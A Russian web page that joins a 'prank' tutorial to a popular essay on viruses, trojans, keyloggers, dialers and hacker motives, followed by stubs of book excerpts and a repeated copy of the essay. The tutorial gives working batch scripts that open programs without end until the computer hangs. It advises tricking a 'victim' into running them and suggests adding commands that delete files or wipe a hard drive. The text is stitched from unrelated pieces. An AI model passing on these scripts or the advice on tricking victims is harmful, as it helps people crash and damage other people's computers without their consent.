- Выражение «5+16» указывает компьютеру создать диалоговое окно с иконкой критической ошибки и двумя кнопками «Повтор» и «Отмена». Изменяя эти числа, можно получить разные типы окон с ошибками. Просто подставьте из приведенных ниже чисел любое число из одной цифры вместо 5 и любое число из двух цифр вместо 16:
- 0 (Кнопка OK)
- 1 (Кнопки OK и Отмена)
- 2 (Кнопки Отмена, Повтор и Пропустить)
- 3 (Кнопки Да, Нет, и Отмена)
- 4 (Кнопки Да и Нет)
- 5 (Кнопки Повтор и Отмена)
- 16 (Иконка критической ошибки)
- 32 (Иконка помощи)
- 48 (Иконка предупреждения)
- 64 (Иконка информации)
Повторяйте сообщение об ошибке сколько вам угодно.
Повторяйте команды, приведенные выше столько раз, сколько пожелаете, с любыми сообщениями об ошибках. Сообщения будут появляться одно за другим, то есть, как только пользователь закроет одно сообщение, откроется другое. Можете использовать этот факт, чтобы создать длинное сообщение, которое будет носить все более неотлагательный характер.
Сохраните документ как файл Visual Basic (VBA).
Когда вы введете все желаемые сообщения, сохраните файл. В меню Блокнота выберите Файл > Сохранить как…
, дайте своему файлу имя с расширением «.vba». Обязательно выберите «Все файлы» из выпадающего списка «Тип файла». Теперь, чтобы шутка удалась, нужно заставить «жертву» запустить этот файл, например используя трюк из метода 1.
Используем предварительно написанный пакетный файл
Запустите Блокнот.
Это шутка использует команды из Блокнота, чтобы заставить компьютер открывать программы случайным образом до тех пор, пока пакетный файл не будет отключен или компьютер не зависнет. Чтобы сделать эту шутку, вам просто нужно скопировать и вставить команды, указанные в этом разделе. Однако
заметьте, что это сработает не на всех компьютерах.
Скопируйте и вставьте следующие команды:
@echo off
cls
begin
goto %random%
:1
start cmd.exe
goto begin:2
start mspaint.exe
goto begin:3
start pinball.exe
goto begin:4
start iexplore.exe
goto begin:5
start explorer.exe
goto begin:6
start solitaire.exe
goto begin:7
start explorer.exe
goto begin:8
start edit.exe
goto begin:9
start iexplore.exe
goto begin:0
start mspaint.exe
goto begin
- Вот образец одной из самых надоедливых программ и ее код:
@echo off
:a
start notepad
goto aВсе, что она делает — открывает Блокнот бесконечное количество раз до тех пор, пока пользователь не закроет окно командной строки. Не запускайте ее на компьютере без присмотра — это может плохо закончиться.
Это упрощенный вариант метода 1, рассмотренного выше.
- Экспериментируйте с разными командами! Если вы хотите сделать шутку зловредной, примените команду, которая удаляет файлы или стирает данные с жесткого диска.
Предупреждения
- У вас могут быть проблемы с использованием вредоносных пакетных файлов или порчей школьных или общественных компьютеров. Непредусмотренная отправка таких файлов через интернет или запись их в общественные системы запрещена.
- Не перестарайтесь. 10 копий чего-то вроде Пинбола очень раздражают. Сотни копий могут привести к зависанию компьютера и лишить кое-кого работы.
Вирусы, шпионы, трояны и диалеры: кто, зачем и как
Я думаю, что, если сегодня у любого школьника спросить, что такое лавсан,
он не станет рассказывать вам о «синтетическом волокне, получаемом при помощи поликонденсации этиленгликоля и двухосновной кислоты ароматического ряда». Нет, его ответ будет вроде этого: «Lovesan, он же msblast – проникающий в операционную систему семейства Microsoft Windows, используя уязвимость в службе DCOM RPC Microsoft Windows». Я боюсь предположить, какие ассоциации будут через некоторое время со словом doom.
Явно не только с одноименной игрой.
Как вы могли понять из названия и вступления, разговор сейчас пойдет о вирусах и иже с ними. Прежде чем перейти к ответам на вопросы, поставленным в названии главы, мне бы хотелось пройтись непосредственно по нашим сегодняшним «гостям». Здесь же будет дан ответ на вопрос, как все это попадает в наши компьютеры.
Суть программы, несущие какие-то деструктивные последствия. Причем неважно, в чем они заключаются: здесь может быть все – от банальной замены разрешений файла и порчи его внутреннего содержания до нарушения работы Интернета и краха операционной системы. Также под вирусом подразумевают программу, не только несущую деструктивные функции, но и способную размножаться. Вот что сказано по этому поводу в одной умной книге: «Обязательным (необходимым) свойством компьютерного вируса является возможность создавать свои дубликаты (не обязательно совпадающие с оригиналом) и внедрять их в вычислительные сети и/или файлы, системные области компьютера и прочие выполняемые объекты. При этом дубликаты сохраняют способность к дальнейшему распространению» (Евгений Касперский, «Компьютерные вирусы»), Действительно, для того, чтобы выжить, вирусам необходимо размножаться, и это доказано такой наукой, как биология. Кстати, именно от тех самых биологических вирусов и произошло название компьютерных. И сами они вполне оправдали свое название: все вирусы просты и, тем не менее, несмотря на старания антивирусных компаний, затраты которых исчисляются огромными суммами, живут и процветают. За примерами далеко ходить не надо: возьмем хотя бы такой вирус, как I-Worm.Mydoom.b. Уж сколько раз говорили, что нельзя открывать вложенные файлы и сообщения электронной почты от неизвестных лиц, да и к посланиям от известных следует относиться с опаской, особенно если вы о таком не договаривались. К тому же, если текст письма будет содержать примерно следующее: «Зацени классную фотку моей девушки», то тут уж его сразу же необходимо удалить. Но если в приведенном выше примере текст еще имеет смысл, то содержание писем, зараженных mydoom’oM, довольно странное. Судите сами: «The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment sendmail daemon reported: Error #804 occured during SMTP session. Partial message has been received. The message contains Unicode characters and has been sent as a binary attachment. The message contains MIME-encoded graphics and has been sent as a binary attachment. Mail transaction failed. Partial message is available».
Внутри письма содержится файл, имеющий 9 вариантов названия вложенного файла и 5 вариантов расширения. Ко мне на ящик приходило две вариации. Первая – zip-apхив с якобы doc-файлом, а второй – это простой ехе’шник с иконкой, замененной на иконку блокнота. Если во втором случае любой пользователь может заметить подвох, посмотрев на разрешение, то в первом сделать это уже сложнее. Именно к первому случаю я склонен относить наибольшее количество заражений. Что делает данный вирус, я рассказывать не буду, т. к. про это уже много раз сказано в печатных изданиях и интернет-ресурсах. На примере Муdoom мы познакомились с первым способом распространения вирусов – через электронную почту.
Следующий способ рассмотрим на примере Worm.Win32.Lovesan (известного также как msblast). Чем же примечателен этот вирус, и почему заражение им приобрело массовый характер? Примечателен сей индивид тем, что в принципе никак не влияет на работоспособность системы в целом. Компьютер, зараженный им, просто не может нормально работать в Интернете. Через некоторое время выскакивает табличка с сообщением об ошибке RPC, после чего компьютер перезагружается.
Еще один способ – через Интернет, когда вы скачиваете файлы (в желательном или нежелательном варианте). Опять же, объясню на примерах. Пример желательного.
Вы скачиваете из Сети какой-нибудь новый прикол, или программу, или игру, а она заражена вирусом. После загрузки программа/игра/прикол запускается, и – вуаля – вы являетесь обладателем вируса. Что тут можно сказать? Будьте бдительны, регулярно обновляйте базы данных своего антивируса, проверяйте все программы антивирусом и не забывайте хотя бы основы компьютерной безопасности. Кто-то может сказать: «А зачем мне, например, проверять программы, которые не могли быть заражены вирусом?». Хочется спросить: «Это что ж за программы такие?» Любые программы могут быть заражены, особенно если скачиваются они с варезников или сайтов хакерских групп.
Теперь перейдем к нежелательной загрузке.
Я бы выделил два вида такой загрузки. Первый – когда пользователь и не подозревает о том, что на его компьютер что-то загружается. Выполняется данная загрузка посредством выполнения скриптов. Второй вид нежелательной загрузки – это когда загружается не то, что надо. Приведу пример. В свое время один сайт с крэками непосредственно перед закачкой файла предлагал установить то «Free XXX bar», то «100 % крэк Интернета». Если пользователь согласился с этим (а я уверен, что такие были, ибо еще помню вопрос месяца в «Виртуальных Радостях» про «стопроцентный крэк инета»), то происходила закачка трояна или вируса. Разница, в принципе, небольшая. Однако это еще не самое интересное: в случае отклонения такого заманчивого предложения выскакивала табличка с надписью приблизительно следующего содержания: «Site error» и кнопочкой О К или Continue, по нажатии на которую закачка трояна все же происходила, правда, уже без ведома пользователя. И спасти от этого мог лишь файрволл
(firewall).
Троян —
это программа, которая предоставляет посторонним доступ к компьютеру для совершения каких-либо действий на месте назначения без предупреждения самого владельца компьютера либо высылает по определенному адресу собранную информацию. При этом она, как правило, выдает себя за что-нибудь мирное и чрезвычайно полезное.
Часть троянских программ ограничивается тем, что отправляет ваши пароли по почте своему создателю или человеку, который сконфигурировал эту программу (e-mail trojan).
Однако для пользователей Internet наиболее опасны программы, позволяющие получить удаленный доступ к их машине со стороны (BackDoor
). Очень часто трояны попадают на компьютер вместе с полезными программами или популярными утилитами, маскируясь под них.
Особенностью этих программ, заставляющей классифицировать их как вредные, является отсутствие предупреждения об их инсталляции и запуске. При запуске троян устанавливает себя в систему и затем следит за ней, при этом пользователю не выдается никаких сообщений о его действиях. Более того, ссылка на троянца может отсутствовать в списке активных приложений или сливаться с ними. В результате пользователь компьютера может и не знать о его присутствии в системе, в то время как компьютер открыт для удаленного управления.
Достаточно часто под понятием «троян» подразумевается вирус. На самом деле это далеко не так. В отличие от вирусов, трояны направлены на получение конфиденциальной информации и доступ к определенным ресурсам компьютера.
Возможны различные пути проникновения трояна в вашу систему. Чаще всего это происходит при запуске какой-либо полезной программы, в которую внедрен сервер трояна. В момент первого запуска сервер копирует себя в какую-нибудь директорию, прописывает себя на запуск в системном реестре, и даже если программа-носитель никогда больше не запустится, ваша система уже заражена трояном. Заразить машину можете вы сами, запустив зараженную программу. Обычно это происходит, если программы скачиваются не с официальных серверов, а с личных страничек. Внедрить трояна могут также посторонние люди при наличии доступа к вашей машине, просто запустив его с дискеты.
На данный момент наибольшее распространение получили трояны следующих типов:
1. Утилиты скрытого (удаленного) администрирования
(BackDoor – с англ. «задняя дверь»), Троянские кони этого класса по своей сути являются достаточно мощными утилитами удаленного администрирования компьютеров в сети. По своей функциональности они во многом напоминают различные системы администрирования, разрабатываемые известными фирмами – производителями программных продуктов. Современные утилиты скрытого администрирования (BackDoor) достаточно просты в использовании. Они обычно состоят главным образом из двух основных частей: сервера (исполнитель) и клиента (управляющий орган сервера). Сервер —
это исполняемый файл, который определенным образом внедряется в вашу машину, загружается в память одновременно с запуском Windows и выполняет получаемые от удаленного клиента команды. Сервер отправляется жертве, и в дальнейшем вся работа ведется через клиента на компьютере хакера, т. е. через клиента посылаются команды, а сервер их выполняет. Внешне его присутствие никак не обнаруживается. После запуска серверной части трояна на компьютере пользователя резервируется определенный порт, отвечающий за связь с Интернетом.
После этих действий злоумышленник запускает клиентскую часть программы, подключается к этому компьютеру через открытый в онлайне порт и может выполнять на вашей машине практически любые действия (это ограничивается лишь возможностями используемой программы). После подключения к серверу управлять удаленным компьютером можно практически как своим: перезагружать, выключать, открывать CD-ROM, удалять, записывать, менять файлы, выводить сообщения и т. д.
На некоторых троянах можно изменять открытый порт в процессе работы и даже устанавливать пароль доступа для «хозяина» данного трояна. Существуют также трояны, которые позволяют использовать «затрояненную» машину в качестве прокси-сервера (протоколы HTTP или Socks) для сокрытия реального IP-адреса хакера.
2. Почтовые
(e-mail trojan).
Трояны, позволяющие «вытаскивать» пароли и другую информацию из файлов вашего компьютера и отправлять их по электронной почте хозяину. Это могут быть логины и Internet-пароли провайдера, пароль от почтового ящика, пароли ICQ, и IRC и др. Чтобы отправить письмо владельцу по почте, троян связывается с почтовым сервером сайта по протоколу SMTP (например, на smtp.mail.ru). После сбора необходимых данных троян проверит, отсылались ли эти данные. Если нет – данные отсылаются и сохраняются в регистре. Если уже отсылались, то из регистра извлекается предыдущее письмо и происходит его сравнение с текущим. Если в информации произошли какие-либо изменения (появились новые данные), то письмо отсылается, и в регистре записываются свежие данные о паролях. Одним словом, этот вид троянов просто занимается сбором информации, и жертва может даже и не догадываться, что ее пароли уже кому-то известны.
3. Клавиатурные
(Keyloggers).
Эти трояны записывают все, что было набрано на клавиатуре (включая пароли) в файл, который впоследствии отправляется на определенный e-mail или просматривается через FTP (File Transfer Protocol). Keylogger’bi обычно занимают мало места и могут маскироваться под другие полезные программы, из-за чего их бывает трудно обнаружить. Еще одной причиной трудности обнаружения такого трояна является то, что его файлы называются как системные. Некоторые трояны этого типа могут выделять и расшифровывать пароли, найденные в специальных полях для ввода паролей.
Такие программы требуют ручной настройки и маскировки. Keylogger’bi можно использовать не только в хулиганских целях. Например, их очень удобно поставить на своем рабочем месте или дома на время отъезда.
4. Программы-шутки
(Joke programs).
Эти программы безвредны по своей сути. Они не причиняют компьютеру какого-либо прямого вреда, однако выводят сообщения о том, что такой вред уже причинен, может быть причинен при каких-либо условиях, либо предупреждают пользователя о несуществующей опасности. Программы-шутки запугивают пользователя сообщениями о форматировании жесткого диска, определяют вирусы в незараженных файлах, выводят странные вирусоподобные сообщения и т. д. – это зависит от чувства юмора создателя такой программы. Конечно же, тут нет никаких причин для волнения, если за этим компьютером не работают другие неопытные пользователи, которых подобные сообщения могут сильно напугать.
5. К «троянским коням» также можно отнести зараженные файлы, код которых определенным образом подправлен или изменен криптографическим методом. Например, файл шифруется специальной программой и/или упаковывается неизвестным архиватором. В итоге даже последние версии антивирусов не могут определить наличие в файле трояна, так как носитель кода отсутствует в их антивирусной базе.
Способы их проникновения не отличаются от вышеописанных. Поэтому сразу же перейдем к рассмотрению. Тут необходимо оговориться, что существуют вполне мирные диалеры, называемые в народе «звонилками». Эти программы используются с целью помочь пользователям dial-up’a дозвониться до провайдера и по возможности поддерживать с ним стабильную связь даже на старых или «модернизированных» линиях. Те же, о которых пойдет наш разговор, имеют другое название – боевые диалеры. Используя бреши в операционной системе, а иногда и по халатности или наивности пользователей (см. выше про «100 % крэк Интернета») данные программы подменяют телефон провайдера телефоном оператора связи из какой-нибудь экзотической страны. Причем, в большинстве случаев, в окне набора номера остается старый добрый телефон провайдера. Еще диалеры прописывают в планировщике задание позвонить в заданное время. И хорошо, если пользователь имеет привычку выключать модем или он у него внешний и орет так, что мама не горюй. А если модем тихонький да встроенный? Вот и я о том. И узнает бедолага о своем горе лишь по приходу ба-а-алыного такого счета за телефон.
Пришла пора рассказать о том, кто же пишет и запускает всю эту гадость в Сеть. Здесь я попытаюсь классифицировать те группы людей, которые занимаются этим неблаговидным делом. Тут не будет сказано о так называемых «белых» хакерах. Объясню, почему. Данная разновидность не представляет опасности для общества и скорее несет ему пользу. Именно они чаще всего пишут вирусы-антивирусы для обезвреживания особо вредоносных особей. Почему вирусы? Эти программы распространяются по тому же механизму, что и вирусы. Почему анти-? Потому что блокируют или удаляют определенный вид вируса с компьютера. Главным их отличием от вирусов является также самоликвидация после выполнения своей задачи и отсутствие каких-либо деструктивных функций. Примером может служить подобный вирус, появившийся в Сети через некоторое время после рецидива Lovesan’a. После загрузки вируса-антивируса Lovesan удалялся, а пользователю предлагалось загрузить обновления для Windows. «Белые» хакеры также находят бреши в программном обеспечении и компьютерных системах, после чего сообщают о найденных ошибках компаниям. Теперь перейдем непосредственно к нашей классификации.
Тип первый: «дети скриптов».
Зовут себя не иначе как HaCkeR-rr, читают журнал «Хакер», не знают ни одного языка программирования, а всех «своих» троянов и вирусов творят посредством скачивания готовых программ из Сети. (Чтобы избежать наездов, оговорюсь, что журнал «Хакер», в принципе, неплох, и материал в нем подается в довольно простой форме – местами, правда. Но в простой форме для людей, уже имеющих какой-то багаж знаний. И материал они дают с умом – не рассказывают все до конца – дабы не привлекли их никуда, надо думать.) Эти «хакеры» обычно, после того как пришлют кому-нибудь скачанный откуда-нибудь троян, и последний сработает, тут же начинают орать на форумах о своей крутизне и т. д. и т. п. За что тут же вполне справедливо получают в свой адрес кучу нелицеприятных высказываний, ибо не дело это. Раз уж напакостил, то лучше помолчи. Особой опасности данные индивиды не представляют, т. к. на более-менее масштабное дело у них просто не хватит ни опыта, ни (в некоторых случаях) мозгов.
Тип второй: «начинающий».
Данный вид является прямым потомком первого. Некоторые из представителей первого типа, спустя какой-то промежуток времени, начинают понимать, что они не так круты, как им казалось, что, оказывается, существуют еще и языки программирования, что можно что-то сделать и после этого не орать на весь мир про то, «какой я молодец». Кто-то из них в будущем, возможно, превратится в представителя класса профи. Эти люди начинают учить какой-нибудь язык, пробовать что-то писать, в них начинает просыпаться творческая мысль. И одновременно они начинают представлять определенную опасность для общества, ибо кто знает, какое ужасающее произведение по неопытности может сочинить такой представитель класса вирусописателей. Ведь когда код пишет профессионал, он, все-таки, осознает, что некоторые вещи делать не нужно, т. к. они могут сыграть против него. У новичка таких знаний нет, и этим он опасен.
Тип третий: «профи».
Развиваются из второго вида. «Профи» отличаются глубоким знанием языков программирования, сетевой безопасности, разбираются в глубинах операционных систем и, что самое важное, обладают очень серьезными знаниями и пониманием механизма работы сетей и компьютерных систем. Причем «профи» не только узнают о брешах в системах безопасности из бюллетеней компаний, но и сами находят их. Часто они объединяются в хакерские группы для улучшения качества своей «работы». Эти люди, в основном, скрытные и не жадные до славы, при проведении какой-нибудь успешной операции не бегут сообщать об этом всему миру, а предпочитают мирно отпраздновать успех в кругу друзей. Безусловно, представляют большую опасность, но, поскольку все они люди знающие, то не пойдут на действия, которые могут вызвать глобальный обвал какой-либо системы – к примеру, Интернета. Хотя бывают и исключения (не все еще забыли про Slammer’a).
Тип четвертый: «промышленные хакеры».
Наиболее опасные для общества представители семейства хакеров. Их по праву можно называть настоящими преступниками. Именно на их совести лежит написание большей части диалеров и взлом сетей банков, крупных компаний и правительственных учреждений. Зачем и ради чего они это делают, мы поговорим ниже. «Промышленники» не считаются ни с чем и ни с кем, эти индивиды способны пойти на все ради достижения своих целей.
Теперь обобщим написанное.
«Дети скриптов»: молодо, зелено да неопытно. Хочется показать, что ты круче всех, а круче тебя – только Крутой Сэм.
«Начинающий»: появилась тяга к написанию чего-то самостоятельного. Часть из них, к счастью, после попытки освоения премудростей интернет-протоколов и языков программирования бросают это дело и идут заниматься чем-то более мирным.
«Профи»: если вдруг наступает состояние «осознал свою вину, меру, степень, глубину», то представитель данного вида становится высококвалифицированным специалистом по компьютерной безопасности. Хотелось бы, чтобы побольше профи перешло к такому состоянию.
«Промышленники»: ничего святого. Про таких хорошо говорит народная мудрость: «Горбатого могила исправит».
Таково грубое разделение на типы представителей класса компьютерных злоумышленников. Теперь перейдем к вопросу: зачем они это делают.
А действительно, зачем пишутся вирусы, трояны, диалеры и прочая нечисть? Одной из причин является желание самоутверждения. Оно характерно для представителей первого и второго типа. Одному просто нужно показать своим друзьям, что он «типа того, реальна, крутой пацан», второму – прежде всего для поднятия уровня самооценки. Вторая причина – получение опыта. Характерна для начинающих. После написания своего первого шедевра, естественно, хочется его на ком-нибудь испытать, – не на себе же, в самом деле. Вот и появляется в Сети определенное число новых, не всегда очень опасных, вирусов.
Следующая причина – дух соперничества. Вы никогда не слышали про хакерские соревнования? Последнее, известное мне состоялось летом. Победила бразильская хакерская группа (оказывается, не только футбол у них силен). Задача стояла следующая: кто сломает больше всего сайтов. Но я уверен, что есть соревнования и по самому навороченному вирусу, и по самому лучшему клавиатурному шпиону.
Адреналин – еще одна причина. Представьте себе: ночь, свет монитора, пальцы бегают по клавиатуре, вчера была найдена брешь в системе защиты, сегодня нужно попытаться получить доступ к системе и показать товарищу администратору, кто в доме хозяин. Следом за этой причиной идет и следующая – романтика. А что, кому нравится на закат смотреть, кому на звезды, а кому – вирусы писать. Сколько людей, столько и вкусов.
Причина следующая – политический или социальный протест. По этой причине взламывается большинство правительственных сайтов, сайтов политических партий, печатных и интернет-изданий, а также крупных корпораций. За примерами далеко ходить не надо. Сразу же после начала войны в Ираке были произведены атаки на американские правительственные сайты со стороны недовольных политикой Буша, а также на сайт арабской газеты «Аль-Джазира» и ряд других арабских ресурсов с противоположной стороны.
И, пожалуй, последняя причина – это вездесущие деньги. Ради них, в основном, работают, если можно так выразиться, промышленные хакеры. Взламывая сети банков, они получают доступ к счетам клиентов. Что за этим последует, догадаться нетрудно. Собирая информацию о любом пользователе Сети посредством программ-шпионов, они в дальнейшем занимаются банальным шантажом. Действия, на которые идут «промышленники», можно перечислять еще очень долго, хочу лишь еще раз сказать, что именно они являются полноценными компьютерными преступниками, и относиться к ним нужно как к преступникам.
Из книги
Журнал `Компьютерра` №726
автора
Журнал «Компьютерра»
Из книги
Журнал «Компьютерра» №25-26 от 12 июля 2005 года
автора
Журнал «Компьютерра»
Шпионы, учите матчасть!
Похоже, в мире начинаются серьезные перемены. Во всяком случае, ничего подобного еще не бывало. Итальянский суд выдал ордер на арест тринадцати сотрудников ЦРУ США по обвинению в похищении человека. И пусть человек этот, имам миланской мечети
Из книги
Журнал «Компьютерра» № 35 от 25 сентября 2007 года
автора
Журнал «Компьютерра»
АНАЛИЗЫ: Шпионы в стране Wikipedia
Автор: Киви БердВпечатляющий рубеж в два миллиона статей, достигнутый англоязычным сегментом Википедии в сентябре нынешнего года, – огромный и несомненный успех мирового интернет-сообщества, объединенными усилиями сумевшего создать
Из книги
Сбои и ошибки ПК. Лечим компьютер сами. Начали!
автора
Ташков Петр
Глава 4
Вирусы, трояны и программы-шпионы
Наверное, не будет ошибкой сказать, что вместе с компьютером появились и программы, пытающиеся ему навредить. Различные вирусы, троянские кони, приложения-шпионы, «черви» и прочие неприятные программные вредители постоянно держат
Из книги
Сбои и ошибки ПК. Лечим компьютер сами
автора
Донцов Дмитрий
Блокируем троянских коней, «червей» и программы-шпионы
Когда-то давно, с появлением первых вирусов, главной опасностью было заражение компьютера и офисных документов. В принципе, большой проблемы в этом не было, поскольку антивирусная программа умела справляться с
Из книги
Цифровой журнал «Компьютерра» № 97
автора
Журнал «Компьютерра»
Из книги
Интернет – легко и просто!
автора
Александров Егор
Кивино гнездо: Шпионы в законе
Киви Берд
Опубликовано 29 ноября 2011 года
У «арабской весны», волной народных восстаний прокатившейся в этом году по ближневосточному региону, есть один примечательный побочный результат. Суть его в том, что у
Из книги
Компьютерра PDA N147 (26.11.2011-02.12.2011)
автора
Журнал «Компьютерра»
Вирусы
Вирус – это приносящая вред компьютерная программа, способная размножаться, создавая свои копии, которые, в свою очередь, также сохраняют способность к размножению (рис. 10.1). В последние годы в связи с бурным развитием сетевых технологий определение слова «вирус»
Из книги
Мошенничество в Интернете. Методы удаленного выманивания денег, и как не стать жертвой злоумышленников
автора
Гладкий Алексей Анатольевич
Кивино гнездо: Шпионы в законе
Автор: Киви БердОпубликовано 29 ноября 2011 годаУ «арабской весны», волной народных восстаний прокатившейся в этом году по ближневосточному региону, есть один примечательный побочный результат. Суть его в том, что у западноевропейской и
Из книги
Бесплатные разговоры через Интернет
автора
Фрузоров Сергей
Чем опасны клавиатурные шпионы?
Клавиатурный шпион – это программа либо устройство, с помощью которого осуществляется постоянное наблюдение за всеми нажатиями клавиш на клавиатуре (а во многих случаях – и за всеми щелчками мыши) с целью получения информации обо всех
Из книги
Создаем вирус и антивирус
автора
Гульев Игорь А.
Вирусы и черви
Вирус — это обычная программа, которая выполняет вредные, а иногда и просто разрушительные действия. Вы спросите, что может сделать вирус? Да практически все, что можно сделать в вашей операционной системе. Давайте рассмотрим это чуточку подробней на
Из книги
Введение в криптографию
автора
Циммерманн Филипп
Клавиатурные шпионы
Клавиатурные шпионы – это программы, запоминающие, какие клавиши были нажаты в ваше отсутствие, то есть – что творилось на вашем компьютере, пока вас не было в офисе. Для этого все, что набирается на клавиатуре, заносится специальной программой в
Из книги
Цифровой журнал «Компьютерра» № 191
автора
Журнал «Компьютерра»
Вирусы и трояны
Атака состоит в применении специально спроектированного компьютерного вируса или червя для заражения установленной у вас программы PGP. Этот гипотетический вирус может быть устроен так, чтобы перехватывать закрытый ключ и пароль или содержимое
Из книги
Цифровой журнал «Компьютерра» № 197
автора
Журнал «Компьютерра»
Аппаратные трояны для процессоров Intel — первая практическая реализация
Андрей Васильков
Опубликовано 19 сентября 2013
Восемь лет назад Министерство обороны США публично выразило обеспокоенность тем, что при достаточном техническом уровне
Из книги
Цифровой журнал «Компьютерра» № 204
автора
Журнал «Компьютерра»
Трояны в китайских утюгах: почему таможня не даёт добро
Андрей Васильков
Опубликовано 28 октября 2013
В минувшие выходные на сайте «Вести.Ру» появилась заметка о том, как российские таможенники обнаружили в партии утюгов из Китая шпионскую начинку.
Из книги
автора
Трояны с претензией на авторское право: как не надо делать скрытые биткойн-майнеры
Андрей Васильков
Опубликовано 20 декабря 2013
В литературных произведениях преступники — злые гении, бросающие интеллектуальный вызов правосудию и лучшим умам
Вирусы, шпионы и диалеры: кто, зачем и как
Я думаю, что, если сегодня у любого школьника спросить, что такое лавсан, он не станет рассказывать вам о «синтетическом волокне, получаемом при помощи поликонденсации этиленгликоля и двухосновной кислоты ароматического ряда». Нет, его ответ будет вроде этого: «Lo-vesan, он же msblast, проникающий в операционную систему семейства Microsoft Windows NT, используя уязвимость в службе DCOM RPC Microsoft Windows». Я боюсь предположить, какие ассоциации будут через некоторое время со словом doom. Явно не только с одноименной игрой.
Как вы могли понять из названия и вступления, разговор сегодня пойдет о вирусах и иже с ними. Прежде чем перейти к ответам на вопросы, поставленные в названии, мне бы хотелось пройтись непосредственно по нашим сегодняшним «гостям». Здесь же будет дан ответ о том, как все это попадает на наши компьютеры.
Вирусы
Вирусы суть программы, несущие какие-то деструктивные последствия. Причем неважно, в чем они заключаются: здесь может быть все — от банальной замены разрешений файла и порчи его внутреннего содержания до нарушения работы Интернета и краха операционной системы. Также под вирусом подразумевают программу, не только несущую деструктивные функции, но и способную размножаться. Вот что сказано по этому поводу в одной умной книге: «Обязательным (необходимым) свойством компьютерного вируса является возможность создавать свои дубликаты (не обязательно совпадающие с оригиналом) и внедрять их в вычислительные сети и/или файлы, системные области компьютера и прочие выполняемые объекты. При этом дубликаты сохраняют способность к дальнейшему распространению» ((с) Евгений Касперский. «Компьютерные вирусы»). Действительно, для того, чтобы выжить, вирусам необходимо размножаться, и это доказано такой наукой, как биология. Кстати, именно от тех самых биологических вирусов и произошло название компьютерных. И сами они вполне оправдали свое название: все вирусы просты и, тем не менее, несмотря на старания антивирусных компаний, затраты которых исчисляются огромными суммами, живут и процветают. За примерами далеко ходить не надо: возьмем хотя бы такой вирус, как I-Worm.Mydoom.b. Уж сколько раз говорили, что нельзя открывать вложенные файлы от неизвестных лиц, да и к посланиям от известных следует относиться с опаской, особенно если вы о таком не договаривались. К тому же, если текст письма будет содержать примерно следующее: «Зацени классную фотку моей девушки», то тут уж его сразу же необходимо отправлять в trash. Но если в приведенном выше примере текст еще имеет смысл, то содержание писем, зараженных mydoom»ом, довольно странное. Судите сами:
The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment sendmail daemon reported: Error #804 occured during SMTP session. Partial message has been received. The message contains Unicode characters and has been sent as a binary attachment. The message contains MIME-encoded graphics and has been sent as a binary attachment. Mail transaction failed. Partial message is available.
Внутри письма содержится файл, имеющий 9 вариантов названия вложенного файла и 5 вариантов расширения. Ко мне на ящик приходило две вариации. Первая — zip-архив с якобы doc-файлом, а второй — это простой exe»шник с иконкой, замененной на иконку блокнота. Если во втором случае любой пользователь может заметить подвох, посмотрев на разрешение, то в первом сделать это уже сложнее. Именно на первый случай я склонен относить наибольшее количество заражений. Что делает данный вирус, я рассказывать не буду, т.к. про это уже много раз сказано в печатных изданиях и интернет-ресурсах. На примере Mydoom мы познакомились с первым способом распространения вирусов — через электронную почту.
Следующий способ рассмотрим на примере Worm.Win32.Lovesan (известного также как msblast). Чем же примечателен этот вирус, и почему заражение им приобрело массовый характер? Примечателен сей индивид тем, что в принципе никак не влияет на работоспособность системы в целом. Компьютер, зараженный им, просто не может нормально работать в Интернете. Через некоторое время выскакивает табличка с сообщением об ошибке RPC, после чего компьютер перезагружается. Как же происходит заражение? Данный вирус использует уязвимость в службе DCOM RPC в Microsoft Windows 2000/XP/2003 и попадает на компьютер пользователя через 135 порт определенного IP-адреса. Как же злоумышленник узнает именно ваш адрес? Да очень просто. Сейчас написано столько IP-сканеров, что даже дошкольнику нетрудно узнать IP-адреса и посмотреть открытые порты, через которые можно загрузить вирус на компьютер. Для наглядности продемонстрирую, как происходит заражение непосредственно вирусом Lovesan. Червь производит сканирование IP-адресов на предмет нахождения открытых и незащищенных портов. Процесс приведен на схеме:
20.40.50.0
20.40.50.1
20.40.50.2
…
20.40.50.19
———— пауза 1,8 секунды
20.40.50.20
…
20.40.50.39
———— пауза 1,8 секунды
…
20.40.51.0
20.40.51.1
…
20.41.0.0
20.41.0.1
и продолжается в таком же духе и далее.
Для сканирования червь выбирает один из двух способов. Способ первый: сканирование случайного base address (A.B.C.D), где D равно 0, а A, B, C случайно выбраны из диапазона 1-255. Диапазон сканирования следующий: …0.
Способ второй: червь определяет адрес локального компьютера (A.B.C.D), устанавливает D в ноль и выбирает значение C. Если C больше 20, то червь выбирает случайное число от 1 до 20. Если C меньше или равно 20, червь не изменяет его. Итак, второй способ распространения вирусов — через незащищенные порты компьютера, используя бреши в программном обеспечении.
Способ третий — через Интернет, когда вы скачиваете файлы (в желательном или нежелательном варианте). Опять же, объясню на примерах. Пример желательного. Вы скачиваете из Сети какой-нибудь новый прикол, или программу, или игру, а она заражена вирусом. После загрузки программа/игра/прикол запускается, и — вуаля — вы являетесь обладателем вируса. Что тут можно сказать? Будьте бдительны, регулярно обновляйте базы данных своего антивируса, проверяйте все программы антивирусом и не забывайте хотя бы основы компьютерной безопасности. Кто-то может сказать: «А зачем мне, например, проверять программы, которые не могли быть заражены вирусом?». Хочется спросить: «Это что ж за программы такие?» Любые программы могут быть заражены, особенно если скачиваются они с варезников или сайтов хакерских групп.
Теперь перейдем к нежелательной загрузке. Я бы выделил два вида такой загрузки. Первый: когда пользователь и не подозревает о том, что на его компьютер что-то загружается. Выполняется данная загрузка посредством выполнения скриптов. Второй вид нежелательной загрузки — это когда загружается не то, что надо. Приведу пример. В свое время один сайт с крэками непосредственно перед закачкой файла предлагал установить то «Free XXX bar», то «100% крэк Интернета». Если пользователь согласился с этим (а я уверен, что такие были, ибо еще помню вопрос месяца в «Виртуальных Радостях» про «стопроцентный крэк инета»), то происходила закачка трояна или вируса. Разница, в принципе, небольшая. Однако это еще не самое интересное: в случае отклонения такого заманчивого предложения выскакивала табличка с надписью приблизительно следующего содержания: «Site error» и кнопочкой ОК или Continue, по нажатию на которую закачка трояна все же происходила, правда, уже без ведома пользователя. И спасти от этого мог лишь файрволл.
